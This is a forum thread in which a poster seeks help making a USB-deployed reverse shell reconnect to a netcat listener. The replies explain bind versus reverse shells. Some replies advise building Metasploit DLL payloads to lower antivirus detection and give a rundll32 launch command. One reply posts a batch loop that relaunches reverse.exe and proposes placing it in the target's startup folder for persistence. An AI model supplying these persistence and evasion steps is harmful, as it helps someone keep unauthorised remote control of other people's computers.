MB60893 Posted January 12, 2014 Share Posted January 12, 2014 Having used the duck to deploy the reverse shell which Darren originally posted on github, I am annoyed frequently that you are required to have a netcat listener up before the reverse shell is opened, and if you disconnect, you can't connect again without opening the reverse.exe file again and specifying the ip address etc. Shannon recently did her segment on a 20 second Mac hack, where she used code by Patrick Mosca. This code is designed so that even if netcat disconnects from the computer, you will still be able to reconnect again after 60 seconds. What I want to do is modify Darren's original code so that after 60 seconds or so, it checks if there is a connection or not, and if nothing is connected, it will rebroadcast to the host name or ip address waiting for netcat to catch the shell. I can't understand Darren's code (no offense Darren, I am new to the coding world :)) and I need to have this capability. Can someone please help me modify the code? Many Thanks, MB60893. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 13, 2014 Author Share Posted January 13, 2014 Please help guys! I am really stuck with this!! Quote Link to comment Share on other sites More sharing options...
no42 Posted January 14, 2014 Share Posted January 14, 2014 you could read up on http://www.akadia.com/services/windows_registry.html Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 14, 2014 Author Share Posted January 14, 2014 (edited) you could read up on http://www.akadia.com/services/windows_registry.html While this is good, it will create multiple instances of the program every 60 seconds if run as a registry command. I still want to keep it simple as well, so I think that modifying the vbscript 'decoder.vbs' is the best bet. What I essentially need to do is recode Darren's reverse shell and add in something which says "If Not Connected, rebroadcast the signal." Can someone please help with this? I need some help and soon! Edited January 14, 2014 by MB60893 Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 18, 2014 Share Posted January 18, 2014 What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding their shell to a port that you connect to. A reverse shell works by the target computer connecting you to over a port and then providing the shell. Both have the same effect but achieve it in very different ways. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 18, 2014 Author Share Posted January 18, 2014 What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding their shell to a port that you connect to. A reverse shell works by the target computer connecting you to over a port and then providing the shell. Both have the same effect but achieve it in very different ways. OK, Thanks for clearing that up about the Bind Shell, however that still doesn't really help me with my problem of recoding the reverse shell to make it a bind shell. Help is still needed! Please Help Me! Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 19, 2014 Share Posted January 19, 2014 I'd recommend using the metasploit framework. I make all my shells through it. It's better than using the same exe every time cos you can add encoding options and even run the whole connection over https rather than tcp. Seeing as your using the ducky, I'd recommend generating a dll rather than an exe - much lower AV detection rate. Run a dll using this: rundll32.exe file.dll, @DllMain12 Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 19, 2014 Share Posted January 19, 2014 OK, Thanks for clearing that up about the Bind Shell, however that still doesn't really help me with my problem of recoding the reverse shell to make it a bind shell. Help is still needed! Please Help Me! I am going to try to make a powershell script to do so. It might be a day or two. Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 19, 2014 Share Posted January 19, 2014 (edited) I think this would work: [bATCH FILE] @echo off :TOP /t timeout 60 powershell Stop-Process -processname C:\reverse.exe powershell Start-Process C:\reverse.exe GOTO TOP The only problem is that it kinda restarts the program even if it running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder. [sAVE IT AS A .BAT file.] Edited January 19, 2014 by Haxineer1337 Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 19, 2014 Author Share Posted January 19, 2014 I think this would work: [bATCH FILE] @echo off :TOP /t timeout 60 powershell Stop-Process -processname C:\reverse.exe powershell Start-Process C:\reverse.exe GOTO TOP The only problem is that it kinda restarts the program even if it running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder. [sAVE IT AS A .BAT file.] While this is a good idea, I still only wish to modify the source code, hence why I am still leaving this thread as unsolved. Thanks everyone so far, but please keep these ideas coming! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.